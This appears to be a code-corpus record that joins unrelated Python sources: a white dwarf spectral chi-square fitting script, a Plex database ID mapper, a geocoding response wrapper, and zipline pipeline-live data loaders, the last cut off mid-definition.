#ax.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(combined),marker='o',s=30,c='r')
#plt.show()
#exit()
#Determine minimum values of each grid
allindex = np.unravel_index(allchi.argmin(),allchi.shape)
alllogg, allteff = logg[allindex[0]], teff[allindex[1]]
#print 'All: ' , alllogg, allteff
try:
alphaindex = np.unravel_index(alphachi.argmin(),alphachi.shape)
alphalogg, alphateff = logg[alphaindex[0]], teff[alphaindex[1]]
#print 'Alpha: ' , alphalogg, alphateff
except:
pass
betaindex = np.unravel_index(betachi.argmin(),betachi.shape)
betalogg, betateff = logg[betaindex[0]], teff[betaindex[1]]
#print 'Beta: ' , betalogg, betateff
gammaindex = np.unravel_index(gammachi.argmin(),gammachi.shape)
gammalogg, gammateff = logg[gammaindex[0]], teff[gammaindex[1]]
#print 'Gamma: ' , gammalogg, gammateff
deltaindex = np.unravel_index(deltachi.argmin(),deltachi.shape)
deltalogg, deltateff = logg[deltaindex[0]], teff[deltaindex[1]]
#print 'Delta: ' , deltalogg, deltateff
epsilonindex = np.unravel_index(epsilonchi.argmin(),epsilonchi.shape)
epsilonlogg, epsilonteff = logg[epsilonindex[0]], teff[epsilonindex[1]]
#print 'Epsilon: ' , epsilonlogg, epsilonteff
H8index = np.unravel_index(H8chi.argmin(),H8chi.shape)
H8logg, H8teff = logg[H8index[0]], teff[H8index[1]]
#print 'H8: ' , H8logg, H8teff
H9index = np.unravel_index(H9chi.argmin(),H9chi.shape)
H9logg, H9teff = logg[H9index[0]], teff[H9index[1]]
#print 'H9: ' , H9logg, H9teff
H10index = np.unravel_index(H10chi.argmin(),H10chi.shape)
H10logg, H10teff = logg[H10index[0]], teff[H10index[1]]
#print 'H10: ' , H10logg, H10teff
combinedindex = np.unravel_index(combined.argmin(),combined.shape)
combinedlogg, combinedteff = logg[combinedindex[0]], teff[combinedindex[1]]
#print 'Combined: ' , combinedlogg, combinedteff
#exit()
#Print the chi-square value of a particular grid at a particular point
#loggwant = np.abs(logg-8.25).argmin()
#teffwant = np.abs(teff-13000).argmin()
#print allchi[loggwant,teffwant]
#Print values along a particular row
#teffwant = np.where(teff == 13900)
#loggwant = np.where(logg == 7.95)
#print H10chi[loggwant,:]
#print H10chi[:,teffwant]
#plt.clf()
#plt.plot(teff,np.array(H10chi[loggwant,:][0][0]))
#plt.show()
#======================================
#Remove part of the chi-square grid if a secondary solution is being found.
if cutteff:
########
#Upper limit on Teff
########
#teff_limit = 14500.
print combined.shape
teffcut = np.abs(teff-teff_limit).argmin()
print teffcut
teff = teff[0:teffcut]
#print len(teff_new)
combined = combined[:,0:teffcut]
betachi = betachi[:,0:teffcut]
H9chi = H9chi[:,0:teffcut]
H8chi = H8chi[:,0:teffcut]
H10chi = H10chi[:,0:teffcut]
b10chi = b10chi[:,0:teffcut]
g10chi = g10chi[:,0:teffcut]
g9chi = g9chi[:,0:teffcut]
deltachi = deltachi[:,0:teffcut]
epsilonchi = epsilonchi[:,0:teffcut]
b9chi = b9chi[:,0:teffcut]
b8chi = b8chi[:,0:teffcut]
g8chi = g8chi[:,0:teffcut]
try:
alphachi = alphachi[:,0:teffcut]
a10chi = a10chi[:,0:teffcut]
except:
pass
'''
#######
#Lower limit on Teff
teff_limit = 14700.
print combined.shape
teffcut = np.abs(teff-teff_limit).argmin()
print teffcut
teff = teff[teffcut:]
#print len(teff_new)
combined = combined[:,teffcut:]
H10chi = H10chi[:,teffcut:]
'''
#Find solution for whatever combinations you want
try:
print '\nAlpha:'
ateff,atefferr,alogg,aloggerr = at.find_solution(alphachi,logg,teff)
print '\nAlpha-10:'
a10teff,a10tefferr,a10logg,a10loggerr = at.find_solution(a10chi,logg,teff)
except:
pass
#exit()
print '\nBeta:'
bteff,btefferr,blogg,bloggerr = at.find_solution(betachi,logg,teff)
print '\nGamma:'
gteff,gtefferr,glogg,gloggerr = at.find_solution(gammachi,logg,teff)
print '\nDelta:'
dteff,dtefferr,dlogg,dloggerr = at.find_solution(deltachi,logg,teff)
print '\nEpsilon:'
eteff,etefferr,elogg,eloggerr = at.find_solution(epsilonchi,logg,teff)
print '\nH8:'
H8teff,H8tefferr,H8logg,H8loggerr = at.find_solution(H8chi,logg,teff)
print '\nH9:'
H9teff,H9tefferr,H9logg,H9loggerr = at.find_solution(H9chi,logg,teff)
print '\nH10:'
H10teff,H10tefferr,H10logg,H10loggerr = at.find_solution(H10chi,logg,teff)
print '\nBeta - H10:'
b10teff,b10tefferr,b10logg,b10loggerr = at.find_solution(b10chi,logg,teff)
print '\nGamma - H10:'
g10teff,g10tefferr,g10logg,g10loggerr = at.find_solution(g10chi,logg,teff)
print '\nGamma - H9:'
g9teff,g9tefferr,g9logg,g9loggerr = at.find_solution(g9chi,logg,teff)
print '\nBeta - H9:'
b9teff,b9tefferr,b9logg,b9loggerr = at.find_solution(b9chi,logg,teff)
print '\nBeta - H8:'
b8teff,b8tefferr,b8logg,b8loggerr = at.find_solution(b8chi,logg,teff)
print '\nGamma - H8:'
g8teff,g8tefferr,g8logg,g8loggerr = at.find_solution(g8chi,logg,teff)
#print '\nCombined:'
#combinedteff,combinedtefferr,combinedlogg,combinedloggerr = at.find_solution(combined,logg,teff)
#exit()
#interpolation = RectBivariateSpline(loggsmall,teffsmall,combinedsmall,kx=3,ky=3,s=0)
interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0)
#lowchi = interpolation(loggval.min(),bestteff)
levels = [1,2,3,10,100,200,300,400,500,600,700] # range(0,1000,300)
#plot contour plot
plt.figure()
#CS = plt.contour(teff,loggsmall,combinedsmall-lowchi)#,levels=levels)
CS = plt.contourf(teff,logg,b9chi,100,cmap='jet')#,levels=levels)
plt.colorbar(CS)
plt.xlim(15000,10000)
plt.ylim(9.5,7.0)
#plt.plot(bestteff,loggval.min(),'^')
#plt.xlim(bestteff+250.,bestteff-250.)
#plt.ylim(loggval.min()+0.25,loggval.min()-0.25)
#plt.clabel(CS,inline=1,fontsize=10)
plt.show()
#Check out the following with a smaller grid
###cs = plt.pcolor(teffsmall,loggsmall,combinedsmall-tpp(bestteff))
###cb = plt.colorbar(cs)
exit() #Below this is some code to fit an elliptic paraboloid to the surface, as well as doing a cubic spline interpolation. These are just other options.
'''
#Fit a different order polynomial
guess = np.zeros(10)
xes = allchi[5,:8]
yes = allchi[:8,5]
pol = np.polyfit(xes,yes,3)
pol2 = np.polyfit(yes,xes,3)
guess[0] = allchi.min()
guess[1] = pol[2]
guess[2] = pol[1]
guess[3] = pol[0]
guess[4] = 1.
guess[5] = 1.
guess[6] = 5.
guess[7] = pol2[0]
guess[8] = pol2[1]
guess[9] = pol2[2]
fa = {'x':np.ravel(teffgrid),'y':np.ravel(logggrid),'z':np.ravel(allchi),'err':np.ravel(error)}
params = mpfit.mpfit(fitpolynomial3,guess,functkw=fa,quiet=True)
zz = polynomial3(teffgrid,logggrid,params.params)
#Fine minimum of fit from coarse grid
fitindex = np.unravel_index(zz.argmin(),zz.shape)
fitlogg, fitteff = logg[fitindex[0]],teff[fitindex[1]]
print 'Fit: ', fitlogg, fitteff
zztest = polynomial3(tefftestgrid,loggtestgrid,params.params)
fitindextest = np.unravel_index(zztest.argmin(),zztest.shape)
fitloggtest, fittefftest = loggtest[fitindextest[0]],tefftest[fitindextest[1]]
print 'Fit: ', fitloggtest, fittefftest
#Plot all Chi square points and the fit
fig3 = plt.figure(3)
ax3 = fig3.gca(projection='3d')
surf3 = ax3.plot_surface(teffgrid,logggrid,zz,rstride=1,cstride=1,shade=False,cmap='jet')
plt.draw()
ax3.scatter(np.ravel(teffgrid),np.ravel(logggrid),np.ravel(allchi),marker='o',s=30)
surf3.set_edgecolors(surf3.to_rgba(surf3._A))
surf3.set_facecolors('white')
#plt.show()
#Calculate residuals and show those too
residuals = zz - allchi
fig4 = plt.figure(4)
ax4 = fig4.gca(projection='3d')
surf4 = ax4.plot_surface(teffgrid,logggrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet')
#plt.draw() #use this if you don't want it filled in
surf4.set_edgecolors(surf4.to_rgba(surf4._A))
surf4.set_facecolors('white')
plt.show()
'''
#Try fitting a polynomial to the smaller subset
error = np.ones([len(loggsmall),len(teffsmall)])
#print loggsmall
#print teffsmall
xes = combinedsmall[len(loggsmall)//2,:]
#print xes
yes = combinedsmall[:,len(teffsmall)/2]
#print yes
pol = np.polyfit(teffsmall,xes,2)
pol2 = np.polyfit(loggsmall,yes,2)
#2-order in both directions
#guess = np.zeros(6)
#guess[0] = combinedsmall.min()
#guess[1] = pol[1]
#guess[2] = pol[0]
#guess[3] = 1.
#guess[4] = pol2[1]
#guess[5] = pol2[0]
'''
#3-order in both directions
guess = np.zeros(10)
guess[0] = combinedsmall.min()
guess[1] = pol[2]
guess[2] = pol[1]
guess[3] = pol[0]
guess[4] = 1.
guess[5] = 1.
guess[6] = 5.
guess[7] = pol2[0]
guess[8] = pol2[1]
guess[9] = pol2[2]
'''
#Elliptic paraboloid
guess = np.zeros(6)
guess[0] = 0.4
guess[1] = teff[combinedindex[1]]
guess[2] = (teffsmall[1] - teffsmall[0]) / (combinedsmall[0,1] - combinedsmall[0,0] ) #15.
guess[3] = logg[combinedindex[0]]
guess[4] = (loggsmall[1] - loggsmall[0]) / (combinedsmall[1,0] - combinedsmall[0,0] )#0.005
guess[5] = combinedsmall.min()
#print guess
fa = {'x':np.ravel(teffsmallgrid),'y':np.ravel(loggsmallgrid),'z':np.ravel(combinedsmall),'err':np.ravel(error)}
#params = mpfit.mpfit(fitpolynomial2,guess,functkw=fa,quiet=True)
params = mpfit.mpfit(fitparaboloid,guess,functkw=fa,quiet=True,maxiter=1000)
print params.status, params.niter, params.fnorm, params.dof
#zz = polynomial2(teffsmallgrid,loggsmallgrid,params.params)
zz = paraboloid(teffsmallgrid,loggsmallgrid,params.params)
guessfit = paraboloid(teffsmallgrid,loggsmallgrid,guess)
#Find minimum of fit from coarse grid
fitindex = np.unravel_index(zz.argmin(),zz.shape)
fitlogg, fitteff = loggsmall[fitindex[0]],teffsmall[fitindex[1]]
#print 'Fit: ', fitlogg, fitteff
zztest = paraboloid(teffsmallfinegrid,loggsmallfinegrid,params.params)
#zztest = polynomial2(teffsmallfinegrid,loggsmallfinegrid,params.params)
fitindextest = np.unravel_index(zztest.argmin(),zztest.shape)
fitloggtest, fittefftest = loggsmallfine[fitindextest[0]],teffsmallfine[fitindextest[1]]
print 'logg fit: ', fitloggtest
print 'Teff fit: ', fittefftest
#Plot all Chi square points and the fit
fig3 = plt.figure(3)
ax3 = fig3.gca(projection='3d')
surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,zz,rstride=1,cstride=1,shade=False,cmap='jet')
#surf3 = ax3.plot_surface(teffsmallgrid,loggsmallgrid,guessfit,rstride=1,cstride=1,shade=False,cmap='jet')
#surf3 = ax3.plot_surface(teffsmallfinegrid,loggsmallfinegrid,zztest,rstride=1,cstride=1,shade=False,cmap='jet')
plt.draw()
ax3.scatter(np.ravel(teffsmallgrid),np.ravel(loggsmallgrid),np.ravel(combinedsmall),marker='o',s=30)
ax3.scatter(fittefftest,fitloggtest,zztest.min(),marker='o',c='r',s=60)
surf3.set_edgecolors(surf3.to_rgba(surf3._A))
surf3.set_facecolors('white')
#plt.show()
#Calculate residuals and show those too
residuals = zz - combinedsmall
fig4 = plt.figure(4)
ax4 = fig4.gca(projection='3d')
surf4 = ax4.plot_surface(teffsmallgrid,loggsmallgrid,residuals,rstride=1,cstride=1,shade=False,cmap='jet')
#plt.draw() #use this if you don't want it filled in
surf4.set_edgecolors(surf4.to_rgba(surf4._A))
surf4.set_facecolors('white')
#plt.show()
#Find delta chi square == 1 surface
deltazztest = zztest - zztest.min()
oldglist = []
oldtlist = []
n,m = 0,0
for j in teffsmallfine:
m = 0
for i in loggsmallfine:
if deltazztest[m,n] <= 1.:
oldglist.append(i)
oldtlist.append(j)
m += 1
n += 1
#print np.amin(oldglist),np.amax(oldglist)
#print np.amin(oldtlist),np.amax(oldtlist)
print 'logg error: ',(np.amax(oldglist)-np.amin(oldglist))/2.
print 'Teff error: ',(np.amax(oldtlist)-np.amin(oldtlist))/2.
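#(The delta chi-square <= 1 region used above corresponds to the conventional
# 1-sigma confidence interval for a single parameter of interest.)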
plt.show()
#===================
#cubic spline interpolation of grid
interpolation = RectBivariateSpline(logg,teff,combined,kx=3,ky=3,s=0)
glist = []
tlist = []
newgrid = np.empty([len(loggsmallfine),len(teffsmallfine)])
print 'Reading off new values'
n,m = 0,0
for j in teffsmallfine:
m = 0
for i in loggsmallfine:
newgrid[m,n] = interpolation(i,j)
if interpolation(i,j) <= 1000: #number is the max delta chi square we want
#print i,j,out(i,j)
glist.append(i)
tlist.append(j)
m += 1
n += 1
print 'Done reading off new values'
interpindex = np.unravel_index(newgrid.argmin(),newgrid.shape)
interplogg, interpteff = loggsmallfine[interpindex[0]], teffsmallfine[interpindex[1]]
print 'Interpolation: ' , interplogg, interpteff
``` |
{
"source": "josh-gaby/plex-movie-agent-mapper",
"score": 3
} |
#### File: plex-movie-agent-mapper/plexmovieagentmapper/dbcopy.py
```python
import os
import shutil
import tempfile
class DbCopy(object):
def __init__(self, original_path):
self._original_path = original_path
def __enter__(self):
temp_dir = tempfile.gettempdir()
base_path = os.path.basename(self._original_path)
self.path = os.path.join(temp_dir,base_path)
shutil.copy2(self._original_path, self.path)
return self.path
def __exit__(self,exc_type, exc_val, exc_tb):
os.remove(self.path)
```
#### File: plex-movie-agent-mapper/plexmovieagentmapper/mapper.py
```python
import os
import re
import logging
from pathlib import Path
import sqlite3
from plexmovieagentmapper import dbcopy
from plexmovieagentmapper import media
class PlexMovieAgentMapper:
def __init__(self, plex_db=None, copy_db=True, debug=False):
"""
:param plex_db:
:param copy_db:
"""
if not plex_db:
raise ValueError("Database path is a required field")
elif not os.path.isfile(plex_db):
raise FileNotFoundError()
self._debug = debug
if self._debug:
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s', level=logging.INFO)
self._plex_db = plex_db
self._copy_db = copy_db
self._current_hash = {}
self._imdb_hash, self._tmdb_hash, self._tvdb_hash, self._plex_hash, self._details_hash = self._generate_matching_hash()
def get_imdb_from_plex_guid(self, plex_guid=None):
"""Returns an IMDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['imdb']
return None
def get_tmdb_from_plex_guid(self, plex_guid=None):
"""Returns a TMDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['tmdb']
return None
def get_tvdb_from_plex_guid(self, plex_guid=None):
"""Returns a TVDB id for a given Plex GUID if a match is found.
:param plex_guid:
:return:
"""
if self._plex_hash.get(plex_guid, None):
return self._plex_hash[plex_guid]['tvdb']
return None
def get_plex_guid_from_imdb(self, imdb_id=None):
"""Returns a Plex GUID for a given IMDB id if a match is found.
:param imdb_id:
:return:
"""
if self._imdb_hash.get(imdb_id, None):
return self._imdb_hash[imdb_id]
return None
def get_plex_guid_from_tmdb(self, tmdb_id=None):
"""Returns a Plex GUID for a given TMDB id if a match is found.
:param tmdb_id:
:return:
"""
if self._tmdb_hash.get(tmdb_id, None):
return self._tmdb_hash[tmdb_id]
return None
def get_plex_guid_from_tvdb(self, tvdb_id=None):
"""Returns a Plex GUID for a given TVDB id if a match is found.
:param tvdb_id:
:return:
"""
if self._tvdb_hash.get(tvdb_id, None):
return self._tvdb_hash[tvdb_id]
return None
def plex_guid_available(self, plex_guid=None):
"""Check if a Plex GUID is in the hash
:param plex_guid:
:return:
"""
return True if plex_guid and self._plex_hash.get(plex_guid, None) else False
def get_details_from_imdb(self, library_id=None, imdb_id=None):
"""Get media item details for a given IMDB id.
:param library_id:
:param imdb_id:
:return:
"""
if imdb_id and self._imdb_hash.get(imdb_id, None):
details = self._details_hash.get(self._imdb_hash[imdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_tmdb(self, library_id=None, tmdb_id=None):
"""Get media item details for a given TMDB id.
:param library_id:
:param tmdb_id:
:return:
"""
if tmdb_id and self._tmdb_hash.get(tmdb_id, None):
details = self._details_hash.get(self._tmdb_hash[tmdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_tvdb(self, library_id=None, tvdb_id=None):
"""Get media item details for a given TVDB id.
:param library_id:
:param tvdb_id:
:return:
"""
if tvdb_id and self._tvdb_hash.get(tvdb_id, None):
details = self._details_hash.get(self._tvdb_hash[tvdb_id])
return details if not library_id or library_id in details.available_libraries else None
return None
def get_details_from_plex_guid(self, library_id=None, plex_guid=None):
"""Get media item details for a given Plex GUID.
:param library_id:
:param plex_guid:
:return:
"""
if plex_guid:
details = self._details_hash.get(plex_guid, None)
if details and library_id:
details.filter_files(library_id)
return details
return None
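# Hedged usage sketch for the lookup API above (hypothetical database path and ids):
#   mapper = PlexMovieAgentMapper(plex_db='/path/to/com.plexapp.plugins.library.db')
#   guid = mapper.get_plex_guid_from_imdb('tt0137523')
#   details = mapper.get_details_from_plex_guid(plex_guid=guid)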
def _generate_matching_hash(self):
"""Generate a series of lookup hashes
:return:
"""
imdb_hash = {}
tmdb_hash = {}
tvdb_hash = {}
plex_agent_hash = {}
details_hash = {}
if self._plex_db and os.path.isfile(self._plex_db):
# Does the user want to copy the database?
if self._copy_db:
db_path = dbcopy.DbCopy(self._plex_db)
else:
db_path = Path(self._plex_db)
with db_path as _db_path:
if os.path.isfile(_db_path):
# Open a connection to the database
conn = sqlite3.connect(_db_path, timeout=10)
# Read each result as a row
conn.row_factory = sqlite3.Row
c = conn.cursor()
# Build a hash for Movies
movie_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mi.library_section_id, GROUP_CONCAT(mp.file, \';\') as file_parts, ls.uuid ' \
'FROM metadata_items mdi ' \
'JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \
'JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \
'JOIN media_items mi ON mi.metadata_item_id = mdi.id ' \
'JOIN media_parts mp ON mp.media_item_id = mi.id ' \
'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \
'WHERE mdi.metadata_type = 1 ' \
'GROUP BY mdi.guid, t.tag, mi.library_section_id'
for row in c.execute(movie_query):
row_id = None
row_type = None
if not row['guid'].startswith('com.plexapp.agents'):
if row['tag'] and 'imdb' in row['tag']:
row_id = row['tag'].split('imdb://')[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['tag'] and 'tmdb' in row['tag']:
row_id = row['tag'].split('tmdb://')[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['tag'] and 'tvdb' in row['tag']:
row_id = row['tag'].split('tvdb://')[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if row['guid'] and 'imdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for IMDB".format(row['guid']))
row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['guid'] and 'themoviedb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TMDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['guid'] and 'thetvdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TVDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if self._debug:
logging.info(u"Agent not matched for Movie ({})".format(row['guid']))
if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None:
if self._debug:
logging.info(u"Finding media files for {} ({})".format(row['title'], row['year']))
plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None}
media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid'])
details_hash[row['guid']] = media_item
if plex_agent_hash.get(row['guid'], None):
details_hash[row['guid']].add_files(row['library_section_id'], row['file_parts'].split(';'))
plex_agent_hash[row['guid']][row_type] = row_id
# Add TV Series to the hash
tv_query = 'SELECT mdi.id as metadata_item_id, t.tag, mdi.guid, mdi.title, mdi.year, mdi.library_section_id, ls.uuid ' \
'FROM metadata_items mdi ' \
'JOIN library_sections ls ON ls.id = mdi.library_section_id ' \
'LEFT JOIN taggings tg ON tg.metadata_item_id = mdi.id ' \
'LEFT JOIN tags t ON t.id = tg.tag_id AND t.tag_type = 314 ' \
'WHERE mdi.metadata_type = 2 ' \
'GROUP BY mdi.guid, t.tag, mdi.library_section_id'
c.execute(tv_query)
tv_series_results = c.fetchall()
for row in tv_series_results:
row_id = None
row_type = None
if not row['guid'].startswith('com.plexapp.agents'):
if row['tag'] and 'imdb' in row['tag']:
row_id = row['tag'].split('imdb://')[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['tag'] and 'tmdb' in row['tag']:
row_id = row['tag'].split('tmdb://')[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['tag'] and 'tvdb' in row['tag']:
row_id = row['tag'].split('tvdb://')[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if row['guid'] and 'imdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for IMDB".format(row['guid']))
row_id = re.split(r'^((?:tt)?\d+)', row['guid'].split('imdb://')[1])[1]
row_type = 'imdb'
imdb_hash[row_id] = row['guid']
elif row['guid'] and 'themoviedb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TMDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('themoviedb://')[1])[1]
row_type = 'tmdb'
tmdb_hash[row_id] = row['guid']
elif row['guid'] and 'thetvdb://' in row['guid']:
if self._debug:
logging.info(u"Matching ({}) for TVDB".format(row['guid']))
row_id = re.split(r'^(\d+)', row['guid'].split('thetvdb://')[1])[1]
row_type = 'tvdb'
tvdb_hash[row_id] = row['guid']
else:
if self._debug:
logging.info(u"Agent not matched TV series ({})".format(row['guid']))
if not plex_agent_hash.get(row['guid'], None) and row_id is not None and row_type is not None:
if self._debug:
logging.info(u"Finding media files for {} ({})".format(row['title'], row['year']))
plex_agent_hash[row['guid']] = {'imdb': None, 'tmdb': None, 'tvdb': None}
media_item = media.Media(row['guid'], row['title'], row['year'], 'video', row['metadata_item_id'], row['uuid'])
details_hash[row['guid']] = media_item
ep_cur = conn.cursor()
# We need to build an episode list
episode_query = 'SELECT GROUP_CONCAT(mp.file, \';\') as file_parts ' \
'FROM metadata_items mdi_s ' \
'JOIN metadata_items mdi_e ON mdi_e.parent_id = mdi_s.id ' \
'JOIN media_items mi ON mi.metadata_item_id = mdi_e.id ' \
'JOIN media_parts mp ON mp.media_item_id = mi.id ' \
'WHERE mdi_s.parent_id = ' + str(row['metadata_item_id'])
episodes = ep_cur.execute(episode_query)
ep_list = episodes.fetchone()['file_parts'].split(';')
details_hash[row['guid']].add_files(row['library_section_id'], ep_list)
if plex_agent_hash.get(row['guid'], None):
plex_agent_hash[row['guid']][row_type] = row_id
conn.close()
return imdb_hash, tmdb_hash, tvdb_hash, plex_agent_hash, details_hash
```
#### File: plex-movie-agent-mapper/plexmovieagentmapper/part.py
```python
class Part(object):
def __init__(self, file=None, library_id=None):
self.file = file
self.library_id = library_id
``` |
{
"source": "joshgeller/pygeocodio",
"score": 3
} |
#### File: pygeocodio/geocodio/data.py
```python
class Address(dict):
"""
Dictionary class that provides some convenience wrappers for accessing
commonly used data elements on an Address.
"""
def __init__(self, address_dict, order="lat"):
super(Address, self).__init__(address_dict)
self.order = order
@property
def coords(self):
"""
        Returns a coordinate tuple for the address location, ordered according
        to the ``order`` attribute: "lat" yields (latitude, longitude), any
        other value yields the GIS-style (longitude, latitude).
"""
x, y = ("lat", "lng") if self.order == "lat" else ("lng", "lat")
try:
return (self["location"][x], self["location"][y])
except KeyError:
return None
@property
def accuracy(self):
"""
Returns the accuracy integer or None of the geocoded address.
"""
try:
return self["accuracy"]
except KeyError:
return None
@property
def formatted_address(self):
"""
        Returns the formatted address string, or an empty string if it is missing.
"""
return self.get("formatted_address", "")
class Location(dict):
"""
Dictionary class that provides some convenience accessors to commonly used
data elements.
"""
def __init__(self, result_dict, order="lat"):
super(Location, self).__init__(result_dict)
try:
self.best_match = Address(self["results"][0], order=order)
# A KeyError would be raised if an address could not be parsed or
# geocoded, i.e. from a batch address geocoding process. An index error
# would be raised under similar circumstances, e.g. the 'results' key
# just refers to an empty list.
except (KeyError, IndexError):
self.best_match = Address({})
self.order = order
@property
def coords(self):
"""
        Returns the coordinate tuple of the best matched result, ordered
        according to the ``order`` attribute (see Address.coords).
"""
return self.best_match.coords
@property
def accuracy(self):
"""
Returns the accuracy integer or None of the geocoded address.
"""
return self.best_match.accuracy
@property
def formatted_address(self):
"""
        Returns the formatted address of the best matched result.
"""
return self.best_match.formatted_address
class LocationCollection(list):
"""
A list of Location objects, with dictionary lookup by address.
"""
    def __init__(self, results_list, order="lat"):
        """
        Loads the individual responses into an internal list and uses the query
        values as lookup keys.
        """
        # Per-instance lookup table; a class-level dict here would be shared
        # (and silently mutated) across every LocationCollection instance.
        self.lookups = {}
        results = []
for index, result in enumerate(results_list):
results.append(Location(result["response"], order=order))
self.lookups[result["query"]] = index
super(LocationCollection, self).__init__(results)
self.order = order
def get(self, key):
"""
Returns an individual Location by query lookup, e.g. address or point.
"""
if isinstance(key, tuple):
# TODO handle different ordering
try:
x, y = float(key[0]), float(key[1])
except IndexError:
raise ValueError("Two values are required for a coordinate pair")
except ValueError:
raise ValueError("Only float or float-coercable values can be passed")
key = "{0},{1}".format(x, y)
return self[self.lookups[key]]
@property
def coords(self):
"""
Returns a list of tuples for the best matched coordinates.
"""
return [l.coords for l in self]
@property
def formatted_addresses(self):
"""
Returns a list of formatted addresses from the Location list
"""
return [l.formatted_address for l in self]
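# --- Hedged usage sketch (added; not part of the original module) ---
# Shows how LocationCollection keys its lookup table by the original query
# string. The sample batch response below is hypothetical and only mimics the
# shape of a Geocodio batch result; it is not real API output.
if __name__ == "__main__":
    sample_batch = [
        {
            "query": "1600 Pennsylvania Ave NW, Washington DC",
            "response": {
                "results": [
                    {
                        "formatted_address": "1600 Pennsylvania Ave NW, Washington, DC 20500",
                        "accuracy": 1,
                        "location": {"lat": 38.8977, "lng": -77.0365},
                    }
                ]
            },
        }
    ]
    collection = LocationCollection(sample_batch)
    best = collection.get("1600 Pennsylvania Ave NW, Washington DC")
    print(best.coords)             # (38.8977, -77.0365) with the default order
    print(best.formatted_address)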
``` |
{
"source": "JoshGenao/pipeline-live",
"score": 2
} |
#### File: data/iex/fundamentals_loader.py
```python
import logging
import numpy as np
from pipeline_live.data.sources import iex
from zipline.pipeline.loaders.base import PipelineLoader
from zipline.utils.numpy_utils import object_dtype
log = logging.getLogger(__name__)
class IEXEventLoader(PipelineLoader):
def _safe_flat_getter(self, symbol, symbols, column):
data = symbols.get(symbol, None)
out = column.missing_value
if data:
out = data[0].get(column.name, column.missing_value)
return out
def load_adjusted_array(self, columns, dates, symbols, mask):
symbol_dict = self._load()
out = {}
for c in columns:
data = np.array([
self._safe_flat_getter(symbol, symbol_dict, c)
for symbol in symbols
], dtype=c.dtype)
if c.dtype == object_dtype:
data[data == None] = c.missing_value # noqa
out[c] = np.tile(data, (len(dates), 1))
return out
class IEXBaseLoader(PipelineLoader):
def load_adjusted_array(self, columns, dates, symbols, mask):
symbol_dict = self._load()
out = {}
for c in columns:
data = np.array([
symbol_dict.get(symbol, {}).get(c.name, c.missing_value)
for symbol in symbols
], dtype=c.dtype)
if c.dtype == object_dtype:
data[data == None] = c.missing_value # noqa
out[c] = np.tile(data, (len(dates), 1))
return out
class IEXKeyStatsLoader(IEXBaseLoader):
def _load(self):
log.info('Loading Key Stats')
return iex.key_stats()
class IEXCompanyLoader(IEXBaseLoader):
def _load(self):
log.info('Loading Company Stats')
return iex.company()
class IEXFinancialsLoader(IEXEventLoader):
def _load(self):
log.info('Loading Financials')
return iex.financials()
class IEXEarningsLoader(IEXEventLoader):
def _load(self):
log.info('Loading Earnings')
return iex.earnings()
```
#### File: data/polygon/fundamentals_loader.py
```python
import numpy as np
from zipline.pipeline.loaders.base import PipelineLoader
from pipeline_live.data.sources import polygon
class PolygonCompanyLoader(PipelineLoader):
def load_adjusted_array(self, columns, dates, symbols, mask):
company = polygon.company()
out = {}
for c in columns:
data = [
company.get(symbol, {}).get(c.name, c.missing_value)
for symbol in symbols
]
out[c] = np.tile(np.array(data, dtype=c.dtype), (len(dates), 1))
return out
```
#### File: pipeline-live/pipeline_live/engine.py
```python
from uuid import uuid4
from numpy import array
import pandas as pd
from pandas import DataFrame
from six import (
iteritems,
)
from toolz import groupby, juxt
from toolz.curried.operator import getitem
from zipline.lib.adjusted_array import ensure_adjusted_array, ensure_ndarray
from zipline.errors import NoFurtherDataError
from zipline.pipeline.engine import default_populate_initial_workspace
from zipline.pipeline.term import AssetExists, InputDates, LoadableTerm
from zipline.utils.calendars import get_calendar
from zipline.utils.numpy_utils import (
as_column,
repeat_first_axis,
)
from zipline.utils.pandas_utils import explode
class LivePipelineEngine(object):
def __init__(self,
list_symbols,
calendar=None,
populate_initial_workspace=None):
self._list_symbols = list_symbols
if calendar is None:
calendar = get_calendar('NYSE').all_sessions
self._calendar = calendar
self._root_mask_term = AssetExists()
self._root_mask_dates_term = InputDates()
self._populate_initial_workspace = (
populate_initial_workspace or default_populate_initial_workspace
)
def run_pipeline(self, pipeline):
